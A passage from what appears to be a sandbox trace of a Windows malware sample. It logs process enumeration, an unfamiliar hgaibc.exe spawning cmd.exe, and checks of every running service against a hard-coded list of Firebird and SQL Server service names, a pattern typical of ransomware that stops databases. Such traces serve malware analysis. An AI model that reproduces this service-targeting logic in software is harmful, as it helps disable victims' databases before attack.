Compression")) returned 1 [0179.445] lstrlenW (lpString="Memory Compression") returned 18 [0179.445] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0179.446] lstrlenW (lpString="sihost.exe") returned 10 [0179.446] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.447] lstrlenW (lpString="svchost.exe") returned 11 [0179.447] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0179.447] lstrlenW (lpString="msoia.exe") returned 9 [0179.448] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0179.448] lstrlenW (lpString="taskhostw.exe") returned 13 [0179.448] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.449] lstrlenW (lpString="explorer.exe") returned 12 [0179.449] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0179.450] lstrlenW (lpString="SearchUI.exe") returned 12 [0179.450] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0179.451] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0179.451] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0179.452] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0179.452] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.453] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0179.453] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0179.453] lstrlenW (lpString="hgaibc.exe") returned 10 [0179.453] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0179.454] lstrlenW (lpString="dllhost.exe") returned 11 [0179.454] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0179.690] lstrlenW (lpString="dllhost.exe") returned 11 [0179.690] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0179.690] lstrlenW (lpString="hgaibc.exe") returned 10 [0179.691] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x2a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0179.691] lstrlenW (lpString="cmd.exe") returned 7 [0179.691] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0179.692] lstrlenW (lpString="conhost.exe") returned 11 [0179.692] Process32NextW (in: hSnapshot=0x364, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0179.693] CloseHandle (hObject=0x364) returned 1 [0179.693] Sleep (dwMilliseconds=0x1f4) [0181.546] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bed90 [0181.546] EnumServicesStatusExW (in: hSCManager=0x6bed90, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0181.546] GetLastError () returned 0xea [0181.546] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x7719f8 [0181.547] EnumServicesStatusExW (in: hSCManager=0x6bed90, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7719f8, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7719f8, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0181.547] CloseServiceHandle (hSCObject=0x6bed90) returned 1 [0181.548] lstrlenW (lpString="Appinfo") returned 7 [0181.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0181.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0181.548] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0181.548] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0181.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0181.548] lstrlenW (lpString="AppXSvc") returned 7 [0181.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0181.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0181.548] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0181.548] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0181.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0181.548] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0181.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0181.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0181.548] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0181.548] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0181.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0181.548] lstrlenW (lpString="Audiosrv") returned 8 [0181.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0181.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0181.548] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0181.548] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0181.548] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0181.548] lstrlenW (lpString="BFE") returned 3 [0181.548] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0181.548] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0181.548] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0181.549] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0181.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0181.549] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0181.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0181.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0181.549] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0181.549] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0181.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0181.549] lstrlenW (lpString="CDPSvc") returned 6 [0181.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0181.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0181.549] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0181.549] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0181.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0181.549] lstrlenW (lpString="ClickToRunSvc") returned 13 [0181.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0181.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0181.549] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0181.549] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0181.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0181.549] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0181.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0181.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0181.549] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0181.549] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0181.549] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0181.549] lstrlenW (lpString="CryptSvc") returned 8 [0181.549] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0181.549] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0181.549] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0181.549] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0181.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0181.550] lstrlenW (lpString="DcomLaunch") returned 10 [0181.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0181.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0181.550] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0181.550] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0181.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0181.550] lstrlenW (lpString="DeviceAssociationService") returned 24 [0181.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0181.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0181.550] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0181.550] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0181.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0181.550] lstrlenW (lpString="Dhcp") returned 4 [0181.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0181.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0181.550] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0181.550] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0181.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0181.550] lstrlenW (lpString="Dnscache") returned 8 [0181.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0181.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0181.550] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0181.550] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0181.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0181.550] lstrlenW (lpString="DPS") returned 3 [0181.550] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0181.550] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0181.550] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0181.550] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0181.550] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0181.550] lstrlenW (lpString="DusmSvc") returned 7 [0181.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0181.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0181.551] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0181.551] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0181.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0181.551] lstrlenW (lpString="EventLog") returned 8 [0181.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0181.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0181.551] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0181.551] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0181.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0181.551] lstrlenW (lpString="EventSystem") returned 11 [0181.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0181.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0181.551] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0181.551] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0181.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0181.551] lstrlenW (lpString="FontCache") returned 9 [0181.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0181.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0181.551] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0181.551] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0181.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0181.551] lstrlenW (lpString="gpsvc") returned 5 [0181.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0181.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0181.551] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0181.551] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0181.551] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0181.551] lstrlenW (lpString="iphlpsvc") returned 8 [0181.551] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0181.551] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0181.552] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0181.552] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0181.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0181.552] lstrlenW (lpString="KeyIso") returned 6 [0181.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0181.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0181.552] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0181.552] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0181.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0181.552] lstrlenW (lpString="LanmanServer") returned 12 [0181.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0181.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0181.552] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0181.552] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0181.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0181.552] lstrlenW (lpString="LanmanWorkstation") returned 17 [0181.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0181.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0181.552] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0181.552] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0181.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0181.552] lstrlenW (lpString="lfsvc") returned 5 [0181.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0181.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0181.552] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0181.552] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0181.552] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0181.552] lstrlenW (lpString="lmhosts") returned 7 [0181.552] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0181.552] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0181.552] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0181.553] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0181.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0181.553] lstrlenW (lpString="LSM") returned 3 [0181.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0181.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0181.553] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0181.553] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0181.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0181.553] lstrlenW (lpString="MpsSvc") returned 6 [0181.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0181.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0181.553] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0181.553] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0181.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0181.553] lstrlenW (lpString="NcbService") returned 10 [0181.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0181.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0181.553] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0181.553] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0181.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0181.553] lstrlenW (lpString="netprofm") returned 8 [0181.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0181.553] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0181.553] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0181.553] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0181.553] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0181.553] lstrlenW (lpString="NgcSvc") returned 6 [0181.553] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0181.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0181.554] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0181.554] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0181.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0181.554] lstrlenW (lpString="NlaSvc") returned 6 [0181.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0181.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0181.554] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0181.554] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0181.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0181.554] lstrlenW (lpString="nsi") returned 3 [0181.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0181.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0181.554] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0181.554] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0181.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0181.554] lstrlenW (lpString="PcaSvc") returned 6 [0181.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0181.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0181.554] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0181.554] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0181.554] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0181.554] lstrlenW (lpString="PlugPlay") returned 8 [0181.554] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0181.554] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0181.554] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0181.554] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0181.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0181.555] lstrlenW (lpString="Power") returned 5 [0181.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0181.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0181.555] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0181.555] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0181.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0181.555] lstrlenW (lpString="ProfSvc") returned 7 [0181.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0181.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0181.555] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0181.555] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0181.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0181.555] lstrlenW (lpString="RpcEptMapper") returned 12 [0181.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0181.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0181.555] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0181.555] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0181.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0181.555] lstrlenW (lpString="RpcSs") returned 5 [0181.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0181.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0181.555] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0181.555] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0181.555] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0181.555] lstrlenW (lpString="SamSs") returned 5 [0181.555] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0181.555] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0181.556] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0181.556] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0181.556] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0181.556] lstrlenW (lpString="Schedule") returned 8 [0181.556] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0181.556] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0181.556] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0181.556] lstrcmpiW 